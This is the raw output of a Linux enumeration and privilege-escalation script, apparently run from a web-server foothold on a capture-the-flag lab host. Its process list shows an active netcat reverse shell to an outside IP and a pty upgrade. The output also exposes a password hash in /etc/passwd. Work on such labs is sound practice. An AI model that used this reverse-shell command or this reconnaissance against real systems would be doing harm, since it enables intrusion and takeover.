
[00;31m#########################################################[00m
[00;31m#[00m [00;33mLocal Linux Enumeration & Privilege Escalation Script[00m [00;31m#[00m
[00;31m#########################################################[00m
[00;33m# www.rebootuser.com[00m
[00;33m# version 0.982[00m

[-] Debug Info
[00;33m[+] Thorough tests = Disabled[00m


[00;33mScan started at:
Thu Jan 14 20:07:11 EET 2021
[00m

[00;33m### SYSTEM ##############################################[00m
[00;31m[-] Kernel information:[00m
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux


[00;31m[-] Kernel information (continued):[00m
Linux version 4.4.0-79-generic (buildd@lcy01-30) (gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.3) ) #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017


[00;31m[-] Specific release information:[00m
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
NAME="Ubuntu"
VERSION="14.04.5 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.5 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"


[00;31m[-] Hostname:[00m
bank


[00;33m### USER/GROUP ##########################################[00m
[00;31m[-] Current user/group info:[00m
uid=33(www-data) gid=33(www-data) groups=33(www-data)


[00;31m[-] Users that have previously logged onto the system:[00m
Username         Port     From             Latest


[00;31m[-] Who else is logged on:[00m
 20:07:11 up  1:22,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT


[00;31m[-] Group memberships:[00m
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(syslog) gid=104(syslog) groups=104(syslog),4(adm)
uid=102(messagebus) gid=106(messagebus) groups=106(messagebus)
uid=103(landscape) gid=109(landscape) groups=109(landscape)
uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=105(bind) gid=112(bind) groups=112(bind)
uid=106(mysql) gid=114(mysql) groups=114(mysql)


[00;31m[-] It looks like we have some admin users:[00m
uid=101(syslog) gid=104(syslog) groups=104(syslog),4(adm)


[00;33m[+] It looks like we have password hashes in /etc/passwd![00m
chris:$1$user3$rAGRVf5p2jYTqtqOW5cPu/
:0:0:chris,,,:/home/chris:/bin/bash


[00;31m[-] Contents of /etc/passwd:[00m
root:x:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
chris:$1$user3$rAGRVf5p2jYTqtqOW5cPu/
:0:0:chris,,,:/home/chris:/bin/bash
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
bind:x:105:112::/var/cache/bind:/bin/false
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false


[00;31m[-] Super user account(s):[00m
root


[00;31m[-] Are permissions on /home directories lax:[00m
total 12K
drwxr-xr-x  3    0 root  4.0K Jan 11 14:19 .
drwxr-xr-x 22    0 root  4.0K Jan 11 14:18 ..
drwxr-xr-x  3 1000 chris 4.0K Jan 11 14:19 chris


[00;31m[-] Root is allowed to login via SSH:[00m
PermitRootLogin yes


[00;33m### ENVIRONMENTAL #######################################[00m
[00;31m[-] Environment information:[00m
APACHE_PID_FILE=/var/run/apache2/apache2.pid
APACHE_RUN_USER=www-data
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOG_DIR=/var/log/apache2
PWD=/tmp
LANG=C
APACHE_RUN_GROUP=www-data
SHLVL=4
APACHE_RUN_DIR=/var/run/apache2
APACHE_LOCK_DIR=/var/lock/apache2
_=/usr/bin/env


[00;31m[-] Path information:[00m
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
drwxr-xr-x 2 0 root  4096 Jan 11 14:18 /bin
drwxr-xr-x 2 0 root 12288 Jan 11 14:19 /sbin
drwxr-xr-x 2 0 root 32768 Jan 11 14:18 /usr/bin
drwxr-xr-x 2 0 root  4096 Jan 11 14:18 /usr/local/bin
drwxr-xr-x 2 0 root  4096 Jan 11 14:18 /usr/local/sbin
drwxr-xr-x 2 0 root 12288 Jan 11 14:18 /usr/sbin


[00;31m[-] Available shells:[00m
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/tmux
/usr/bin/screen


[00;31m[-] Current umask value:[00m
0022
u=rwx,g=rx,o=rx


[00;31m[-] umask value as specified in /etc/login.defs:[00m
UMASK		022


[00;31m[-] Password and storage information:[00m
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7
ENCRYPT_METHOD SHA512


[00;33m### JOBS/TASKS ##########################################[00m
[00;31m[-] Cron jobs:[00m
-rw-r--r-- 1 0 root  722 Feb  9  2013 /etc/crontab

/etc/cron.d:
total 16
drwxr-xr-x  2 0 root 4096 Jan 11 14:18 .
drwxr-xr-x 96 0 root 4096 Jan 14 18:45 ..
-rw-r--r--  1 0 root  102 Feb  9  2013 .placeholder
-rw-r--r--  1 0 root  510 Feb  9  2017 php5

/etc/cron.daily:
total 76
drwxr-xr-x  2 0 root  4096 Jan 11 14:18 .
drwxr-xr-x 96 0 root  4096 Jan 14 18:45 ..
-rw-r--r--  1 0 root   102 Feb  9  2013 .placeholder
-rwxr-xr-x  1 0 root   625 May  9  2017 apache2
-rwxr-xr-x  1 0 root   376 Apr  4  2014 apport
-rwxr-xr-x  1 0 root 15481 Apr 10  2014 apt
-rwxr-xr-x  1 0 root   314 Feb 18  2014 aptitude
-rwxr-xr-x  1 0 root   355 Jun  4  2013 bsdmainutils
-rwxr-xr-x  1 0 root   256 Mar  7  2014 dpkg
-rwxr-xr-x  1 0 root   372 Jan 22  2014 logrotate
-rwxr-xr-x  1 0 root  1261 Sep 23  2014 man-db
-rwxr-xr-x  1 0 root   435 Jun 20  2013 mlocate
-rwxr-xr-x  1 0 root   249 Feb 17  2014 passwd
-rwxr-xr-x  1 0 root  2417 May 13  2013 popularity-contest
-rwxr-xr-x  1 0 root   214 Oct  7  2014 update-notifier-common
-rwxr-xr-x  1 0 root   328 Jul 18  2014 upstart

/etc/cron.hourly:
total 12
drwxr-xr-x  2 0 root 4096 Jan 11 14:18 .
drwxr-xr-x 96 0 root 4096 Jan 14 18:45 ..
-rw-r--r--  1 0 root  102 Feb  9  2013 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 0 root 4096 Jan 11 14:18 .
drwxr-xr-x 96 0 root 4096 Jan 14 18:45 ..
-rw-r--r--  1 0 root  102 Feb  9  2013 .placeholder

/etc/cron.weekly:
total 28
drwxr-xr-x  2 0 root 4096 Jan 11 14:18 .
drwxr-xr-x 96 0 root 4096 Jan 14 18:45 ..
-rw-r--r--  1 0 root  102 Feb  9  2013 .placeholder
-rwxr-xr-x  1 0 root  730 Feb 23  2014 apt-xapian-index
-rwxr-xr-x  1 0 root  427 Apr 16  2014 fstrim
-rwxr-xr-x  1 0 root  771 Sep 23  2014 man-db
-rwxr-xr-x  1 0 root  211 Oct  7  2014 update-notifier-common


[00;31m[-] Crontab contents:[00m
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


[00;33m### NETWORKING  ##########################################[00m
[00;31m[-] Network and IP info:[00m
eth0      Link encap:Ethernet  HWaddr 00:50:56:b9:b7:27  
          inet addr:10.129.29.200  Bcast:10.129.255.255  Mask:255.255.0.0
          inet6 addr: fe80::250:56ff:feb9:b727/64 Scope:Link
          inet6 addr: dead:beef::250:56ff:feb9:b727/64 Scope:Global
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:27038 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3577 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:1921970 (1.9 MB)  TX bytes:495169 (495.1 KB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:20 errors:0 dropped:0 overruns:0 frame:0
          TX packets:20 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:1754 (1.7 KB)  TX bytes:1754 (1.7 KB)


[00;31m[-] ARP history:[00m
? (10.129.0.1) at 00:50:56:b9:c3:5e [ether] on eth0


[00;31m[-] Nameserver(s):[00m
nameserver 1.1.1.1
nameserver 8.8.8.8
nameserver 192.168.1.7


[00;31m[-] Default route:[00m
default         10.129.0.1      0.0.0.0         UG    0      0        0 eth0


[00;31m[-] Listening TCP:[00m
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 10.129.29.200:53        0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::53                   :::*                    LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
tcp6       0      0 ::1:953                 :::*                    LISTEN      -               


[00;31m[-] Listening UDP:[00m
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 0.0.0.0:55845           0.0.0.0:*                           -               
udp        0      0 10.129.29.200:53        0.0.0.0:*                           -               
udp        0      0 127.0.0.1:53            0.0.0.0:*                           -               
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -               
udp6       0      0 :::54274                :::*                                -               
udp6       0      0 :::53                   :::*                                -               


[00;33m### SERVICES #############################################[00m
[00;31m[-] Running processes:[00m
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
0            1  0.0  0.3   4312  3432 ?        Ss   18:44   0:01 /sbin/init
0            2  0.0  0.0      0     0 ?        S    18:44   0:00 [kthreadd]
0            3  0.0  0.0      0     0 ?        S    18:44   0:00 [ksoftirqd/0]
0            5  0.0  0.0      0     0 ?        S<   18:44   0:00 [kworker/0:0H]
0            6  0.0  0.0      0     0 ?        S    18:44   0:00 [kworker/u16:0]
0            7  0.0  0.0      0     0 ?        S    18:44   0:00 [rcu_sched]
0            8  0.0  0.0      0     0 ?        S    18:44   0:00 [rcu_bh]
0            9  0.0  0.0      0     0 ?        S    18:44   0:00 [migration/0]
0           10  0.0  0.0      0     0 ?        S    18:44   0:00 [watchdog/0]
0           11  0.0  0.0      0     0 ?        S    18:44   0:00 [kdevtmpfs]
0           12  0.0  0.0      0     0 ?        S<   18:44   0:00 [netns]
0           13  0.0  0.0      0     0 ?        S<   18:44   0:00 [perf]
0           14  0.0  0.0      0     0 ?        S    18:44   0:00 [khungtaskd]
0           15  0.0  0.0      0     0 ?        S<   18:44   0:00 [writeback]
0           16  0.0  0.0      0     0 ?        SN   18:44   0:00 [ksmd]
0           17  0.0  0.0      0     0 ?        SN   18:44   0:00 [khugepaged]
0           18  0.0  0.0      0     0 ?        S<   18:44   0:00 [crypto]
0           19  0.0  0.0      0     0 ?        S<   18:44   0:00 [kintegrityd]
0           20  0.0  0.0      0     0 ?        S<   18:44   0:00 [bioset]
0           21  0.0  0.0      0     0 ?        S<   18:44   0:00 [kblockd]
0           22  0.0  0.0      0     0 ?        S<   18:44   0:00 [ata_sff]
0           23  0.0  0.0      0     0 ?        S<   18:44   0:00 [md]
0           24  0.0  0.0      0     0 ?        S<   18:44   0:00 [devfreq_wq]
0           25  0.0  0.0      0     0 ?        S    18:44   0:00 [kworker/u16:1]
0           26  0.0  0.0      0     0 ?        S    18:44   0:00 [kworker/0:1]
0           28  0.0  0.0      0     0 ?        S    18:44   0:00 [kswapd0]
0           29  0.0  0.0      0     0 ?        S<   18:44   0:00 [vmstat]
0           30  0.0  0.0      0     0 ?        S    18:44   0:00 [fsnotify_mark]
0           31  0.0  0.0      0     0 ?        S    18:44   0:00 [ecryptfs-kthrea]
0           47  0.0  0.0      0     0 ?        S<   18:44   0:00 [kthrotld]
0           48  0.0  0.0      0     0 ?        S<   18:44   0:00 [acpi_thermal_pm]
0           49  0.0  0.0      0     0 ?        S<   18:44   0:00 [bioset]
0           50  0.0  0.0      0     0 ?        S<   18:44   0:00 [bioset]
0           52  0.0  0.0      0     0 ?        S<   18:44   0:00 [bioset]
0           53  0.0  0.0      0     0 ?        S<   18:44   0:00 [bioset]
0           54  0.0  0.0      0     0 ?        S<   18:44   0:00 [bioset]
0           55  0.0  0.0      0     0 ?        S<   18:44   0:00 [bioset]
0           56  0.0  0.0      0     0 ?        S<   18:44   0:00 [bioset]
0           57  0.0  0.0      0     0 ?        S<   18:44   0:00 [bioset]
0           58  0.0  0.0      0     0 ?        S    18:44   0:00 [scsi_eh_0]
0           59  0.0  0.0      0     0 ?        S<   18:44   0:00 [scsi_tmf_0]
0           60  0.0  0.0      0     0 ?        S    18:44   0:00 [scsi_eh_1]
0           61  0.0  0.0      0     0 ?        S<   18:44   0:00 [scsi_tmf_1]
0           64  0.0  0.0      0     0 ?        S<   18:44   0:00 [ipv6_addrconf]
0           77  0.0  0.0      0     0 ?        S<   18:44   0:00 [deferwq]
0           78  0.0  0.0      0     0 ?        S<   18:44   0:00 [charger_manager]
0           92  0.0  0.0      0     0 ?        S    18:44   0:00 [kworker/0:2]
0          134  0.0  0.0      0     0 ?        S    18:44   0:00 [scsi_eh_2]
0          135  0.0  0.0      0     0 ?        S<   18:44   0:00 [scsi_tmf_2]
0          136  0.0  0.0      0     0 ?        S<   18:44   0:00 [vmw_pvscsi_wq_2]
0          138  0.0  0.0      0     0 ?        S<   18:44   0:00 [bioset]
0          141  0.0  0.0      0     0 ?        S<   18:44   0:00 [kpsmoused]
0          165  0.0  0.0      0     0 ?        S    18:45   0:00 [jbd2/sda1-8]
0          166  0.0  0.0      0     0 ?        S<   18:45   0:00 [ext4-rsv-conver]
0          192  0.0  0.0      0     0 ?        S<   18:45   0:00 [kworker/0:1H]
0          296  0.0  0.2   3028  2104 ?        S    18:45   0:00 upstart-udev-bridge --daemon
0          300  0.0  0.3  12404  3364 ?        Ss   18:45   0:00 /lib/systemd/systemd-udevd --daemon
message+   367  0.0  0.1   4268  2036 ?        Ss   18:45   0:00 dbus-daemon --system --fork
0          392  0.0  0.2   3996  2800 ?        Ss   18:45   0:00 /lib/systemd/systemd-logind
syslog     408  0.0  0.2  30492  2748 ?        Ssl  18:45   0:00 rsyslogd
0          429  0.0  0.1   3160  1780 ?        S    18:45   0:00 upstart-file-bridge --daemon
0          474  0.0  0.0      0     0 ?        S<   18:45   0:00 [ttm_swap]
0          620  0.0  0.1   3020  1920 ?        S    18:45   0:00 upstart-socket-bridge --daemon
0          650  0.0  0.3   5528  3792 ?        Ss   18:45   0:00 dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
0          800  0.0  0.1   4660  1984 tty4     Ss+  18:45   0:00 /sbin/getty -8 38400 tty4
0          803  0.0  0.1   4660  1996 tty5     Ss+  18:45   0:00 /sbin/getty -8 38400 tty5
0          808  0.0  0.1   4660  1916 tty2     Ss+  18:45   0:00 /sbin/getty -8 38400 tty2
0          809  0.0  0.1   4660  1760 tty3     Ss+  18:45   0:00 /sbin/getty -8 38400 tty3
0          812  0.0  0.1   4660  2000 tty6     Ss+  18:45   0:00 /sbin/getty -8 38400 tty6
daemon     843  0.0  0.0   2656   124 ?        Ss   18:45   0:00 atd
0          844  0.0  0.4   7828  5076 ?        Ss   18:45   0:00 /usr/sbin/sshd -D
0          846  0.0  0.2   3068  2228 ?        Ss   18:45   0:00 cron
mysql      941  0.0  4.4 327380 45312 ?        Ssl  18:45   0:02 /usr/sbin/mysqld
bind       952  0.0  1.5  47160 15940 ?        Ssl  18:45   0:00 /usr/sbin/named -u bind
0         1003  0.1  0.6  43216  6728 ?        Sl   18:45   0:05 /usr/bin/vmtoolsd
0         1081  0.0  2.0 103516 21360 ?        Ss   18:45   0:00 /usr/sbin/apache2 -k start
www-data  1084  0.0  0.3  21540  3532 ?        S    18:45   0:00 /usr/sbin/apache2 -k start
0         1085  0.0  0.1   2212  1576 ?        Ss   18:45   0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
www-data  1088  0.0  1.1 103736 11328 ?        S    18:45   0:00 /usr/sbin/apache2 -k start
www-data  1089  0.0  1.1 103892 11696 ?        S    18:45   0:00 /usr/sbin/apache2 -k start
www-data  1090  0.0  1.1 103792 11620 ?        S    18:45   0:00 /usr/sbin/apache2 -k start
www-data  1091  0.0  1.1 103828 11956 ?        S    18:45   0:00 /usr/sbin/apache2 -k start
www-data  1092  0.0  1.1 103736 11836 ?        S    18:45   0:00 /usr/sbin/apache2 -k start
0         1161  0.0  0.1   4660  2004 tty1     Ss+  18:45   0:00 /sbin/getty -8 38400 tty1
0         1263  0.0  0.0      0     0 ?        S    18:45   0:00 [kauditd]
www-data  1288  0.0  0.9 103596  9992 ?        S    18:46   0:00 /usr/sbin/apache2 -k start
www-data  1391  0.0  0.0   2284   580 ?        S    19:11   0:00 sh -c nc -e /bin/sh 10.10.14.25 8081
www-data  1392  0.0  0.0   2284   620 ?        S    19:11   0:00 sh
www-data  1397  0.0  0.5   7548  5900 ?        S    19:11   0:00 python -c import pty;pty.spawn("/bin/bash");
www-data  1398  0.0  0.2   3600  3064 pts/0    Ss   19:11   0:00 /bin/bash
www-data  2337  0.0  0.0   2284   576 pts/0    S    19:53   0:00 /bin/sh
www-data  2374  0.0  0.2   3560  2956 pts/0    S    19:57   0:00 /bin/bash
www-data  2465  0.0  0.3   4212  3540 pts/0    S+   20:07   0:00 /bin/bash ./LinEnum.sh
www-data  2466  0.0  0.1   2192  1152 pts/0    S+   20:07   0:00 tee -a result.txt
www-data  2467  0.0  0.3   4248  3116 pts/0    S+   20:07   0:00 /bin/bash ./LinEnum.sh
www-data  2468  0.0  0.0   2192   548 pts/0    S+   20:07   0:00 tee -a
0         2624  0.0  0.5   9856  5620 ?        Ss   20:07   0:00 sshd: unknown [priv]
sshd      2625  0.0  0.2   9172  2676 ?        S    20:07   0:00 sshd: unknown [net] 
www-data  2646  0.0  0.2   4248  2656 pts/0    S+   20:08   0:00 /bin/bash ./LinEnum.sh
www-data  2647  0.0  0.1   3156  1996 pts/0    R+   20:08   0:00 ps aux


[00;31m[-] Process binaries and associated permissions (from above list):[00m
-rwxr-xr-x 1 0 root   986672 May 16  2017 /bin/bash
lrwxrwxrwx 1 0 root        4 May 28  2017 /bin/sh -> dash
-rwxr-xr-x 1 0 root   259552 Feb  7  2017 /lib/systemd/systemd-logind
-rwxr-xr-x 1 0 root   235064 Feb  7  2017 /lib/systemd/systemd-udevd
-rwxr-xr-x 2 0 root    26756 Nov 24  2016 /sbin/getty
-rwxr-xr-x 1 0 root   252080 Jul 18  2014 /sbin/init
-rwxr-xr-x 1 0 root    38996 Jun 17  2014 /usr/bin/vmtoolsd
-rwxr-xr-x 1 0 root   597796 May  9  2017 /usr/sbin/apache2
-rwxr-xr-x 1 0 root 10724544 Apr 25  2017 /usr/sbin/mysqld
-rwxr-xr-x 1 0 root   573516 Apr 13  2017 /usr/sbin/named
-rwxr-xr-x 1 0 root   834648 Aug 11  2016 /usr/sbin/sshd


[00;31m[-] /etc/init.d/ binary permissions:[00m
total 204
drwxr-xr-x  2 0 root 4096 Jan 11 14:18 .
drwxr-xr-x 96 0 root 4096 Jan 14 18:45 ..
-rw-r--r--  1 0 root    0 Aug  3  2016 .legacy-bootordering
-rw-r--r--  1 0 root 2427 Mar 13  2014 README
-rwxr-xr-x  1 0 root 2243 Apr  3  2014 acpid
-rwxr-xr-x  1 0 root 9974 Jan  7  2014 apache2
-rwxr-xr-x  1 0 root 4125 Mar 16  2017 apparmor
-rwxr-xr-x  1 0 root 2801 May 18  2016 apport
-rwxrwxr-x  1 0 root 1071 Sep  8  2013 atd
-rwxr-xr-x  1 0 root 3451 Apr 13  2017 bind9
-rwxr-xr-x  1 0 root 1919 Jan 18  2011 console-setup
lrwxrwxrwx  1 0 root   21 May 28  2017 cron -> /lib/init/upstart-job
-rwxr-xr-x  1 0 root 2813 Nov 25  2014 dbus
-rwxr-xr-x  1 0 root 1217 Mar  7  2013 dns-clean
lrwxrwxrwx  1 0 root   21 Mar 14  2012 friendly-recovery -> /lib/init/upstart-job
-rwxr-xr-x  1 0 root 1105 May 13  2015 grub-common
-rwxr-xr-x  1 0 root 1329 Mar 13  2014 halt
-rwxr-xr-x  1 0 root 1864 Nov 12  2012 irqbalance
-rwxr-xr-x  1 0 root 1293 Mar 13  2014 killprocs
-rwxr-xr-x  1 0 root 1990 Jan 22  2013 kmod
-rwxr-xr-x  1 0 root 5491 Feb 19  2014 mysql
-rwxr-xr-x  1 0 root 4479 Mar 20  2014 networking
-rwxr-xr-x  1 0 root 1581 Feb 17  2016 ondemand
-rwxr-xr-x  1 0 root 1466 Mar 11  2014 open-vm-tools
-rwxr-xr-x  1 0 root  561 Apr 21  2015 pppd-dns
-rwxr-xr-x  1 0 root 1192 May 27  2013 procps
-rwxr-xr-x  1 0 root 6120 Mar 13  2014 rc
-rwxr-xr-x  1 0 root  782 Mar 13  2014 rc.local
-rwxr-xr-x  1 0 root  117 Mar 13  2014 rcS
-rwxr-xr-x  1 0 root  639 Mar 13  2014 reboot
-rwxr-xr-x  1 0 root 2918 Jun 13  2014 resolvconf
-rwxr-xr-x  1 0 root 4395 Jan 20  2016 rsync
-rwxr-xr-x  1 0 root 2913 Dec  4  2013 rsyslog
-rwxr-xr-x  1 0 root 1226 Jul 22  2013 screen-cleanup
-rwxr-xr-x  1 0 root 3920 Mar 13  2014 sendsigs
-rwxr-xr-x  1 0 root  590 Mar 13  2014 single
-rw-r--r--  1 0 root 4290 Mar 13  2014 skeleton
-rwxr-xr-x  1 0 root 4077 May  2  2014 ssh
-rwxr-xr-x  1 0 root  731 Feb  5  2014 sudo
-rwxr-xr-x  1 0 root 6173 Apr 14  2014 udev
-rwxr-xr-x  1 0 root 2721 Mar 13  2014 umountfs
-rwxr-xr-x  1 0 root 2260 Mar 13  2014 umountnfs.sh
-rwxr-xr-x  1 0 root 1872 Mar 13  2014 umountroot
-rwxr-xr-x  1 0 root 1361 Dec  6  2013 unattended-upgrades
-rwxr-xr-x  1 0 root 3111 Mar 13  2014 urandom


[00;31m[-] /etc/init/ config file permissions:[00m
total 336
drwxr-xr-x  2 0 root 4096 Jan 11 14:18 .
drwxr-xr-x 96 0 root 4096 Jan 14 18:45 ..
-rw-r--r--  1 0 root  320 Apr  3  2014 acpid.conf
-rw-r--r--  1 0 root 1582 May 18  2016 apport.conf
-rw-r--r--  1 0 root  261 Oct 21  2013 atd.conf
-rw-r--r--  1 0 root  328 Feb 22  2014 bootmisc.sh.conf
-rw-r--r--  1 0 root  232 Feb 22  2014 checkfs.sh.conf
-rw-r--r--  1 0 root  253 Feb 22  2014 checkroot-bootclean.sh.conf
-rw-r--r--  1 0 root  307 Feb 22  2014 checkroot.sh.conf
-rw-r--r--  1 0 root  250 Oct  9  2012 console-font.conf
-rw-r--r--  1 0 root  509 Dec 21  2010 console-setup.conf
-rw-r--r--  1 0 root  266 Apr 12  2014 console.conf
-rw-r--r--  1 0 root 1122 Apr 12  2014 container-detect.conf
-rw-r--r--  1 0 root  356 Apr 12  2014 control-alt-delete.conf
-rw-r--r--  1 0 root  297 Feb  9  2013 cron.conf
-rw-r--r--  1 0 root  489 Nov 11  2013 dbus.conf
-rw-r--r--  1 0 root  273 Nov 19  2010 dmesg.conf
-rw-r--r--  1 0 root 1377 Apr 12  2014 failsafe.conf
-rw-r--r--  1 0 root  267 Apr 12  2014 flush-early-job-log.conf
-rw-r--r--  1 0 root 1247 Mar 14  2012 friendly-recovery.conf
-rw-r--r--  1 0 root  284 Jul 23  2013 hostname.conf
-rw-r--r--  1 0 root  444 Apr 16  2014 hwclock-save.conf
-rw-r--r--  1 0 root  557 Apr 16  2014 hwclock.conf
-rw-r--r--  1 0 root  579 Aug 26  2014 irqbalance.conf
-rw-r--r--  1 0 root  689 Apr 10  2014 kmod.conf
-rw-r--r--  1 0 root  268 Feb 22  2014 mountall-bootclean.sh.conf
-rw-r--r--  1 0 root  349 Feb 22  2014 mountall-net.conf
-rw-r--r--  1 0 root  261 Feb 22  2014 mountall-reboot.conf
-rw-r--r--  1 0 root 1201 Feb 22  2014 mountall-shell.conf
-rw-r--r--  1 0 root 1232 Feb 22  2014 mountall.conf
-rw-r--r--  1 0 root  311 Feb 22  2014 mountall.sh.conf
-rw-r--r--  1 0 root  327 Feb 22  2014 mountdevsubfs.sh.conf
-rw-r--r--  1 0 root  405 Feb 22  2014 mounted-debugfs.conf
-rw-r--r--  1 0 root  730 Feb 22  2014 mounted-dev.conf
-rw-r--r--  1 0 root  480 Feb 22  2014 mounted-proc.conf
-rw-r--r--  1 0 root  618 Feb 22  2014 mounted-run.conf
-rw-r--r--  1 0 root 1890 Feb 22  2014 mounted-tmp.conf
-rw-r--r--  1 0 root  903 Feb 22  2014 mounted-var.conf
-rw-r--r--  1 0 root  323 Feb 22  2014 mountkernfs.sh.conf
-rw-r--r--  1 0 root  249 Feb 22  2014 mountnfs-bootclean.sh.conf
-rw-r--r--  1 0 root  313 Feb 22  2014 mountnfs.sh.conf
-rw-r--r--  1 0 root  238 Feb 22  2014 mtab.sh.conf
-rw-r--r--  1 0 root 1770 Feb 19  2014 mysql.conf
-rw-r--r--  1 0 root  530 Mar 20  2014 network-interface-container.conf
-rw-r--r--  1 0 root 1756 May  4  2013 network-interface-security.conf
-rw-r--r--  1 0 root 1109 May  8  2014 network-interface.conf
-rw-r--r--  1 0 root 2493 Mar 20  2014 networking.conf
-rw-r--r--  1 0 root  534 Feb 17  2014 passwd.conf
-rw-r--r--  1 0 root  326 Mar 13  2014 plymouth-log.conf
-rw-r--r--  1 0 root  675 Mar 13  2014 plymouth-ready.conf
-rw-r--r--  1 0 root  778 Mar 13  2014 plymouth-shutdown.conf
-rw-r--r--  1 0 root  899 Mar 13  2014 plymouth-splash.conf
-rw-r--r--  1 0 root  796 Mar 13  2014 plymouth-stop.conf
-rw-r--r--  1 0 root  421 Apr 11  2014 plymouth-upstart-bridge.conf
-rw-r--r--  1 0 root  519 Mar 13  2014 plymouth.conf
-rw-r--r--  1 0 root  363 Jan  6  2014 procps.conf
-rw-r--r--  1 0 root 1543 Apr 12  2014 rc-sysinit.conf
-rw-r--r--  1 0 root  661 Apr 12  2014 rc.conf
-rw-r--r--  1 0 root  683 Apr 12  2014 rcS.conf
-rw-r--r--  1 0 root  457 Dec 13  2012 resolvconf.conf
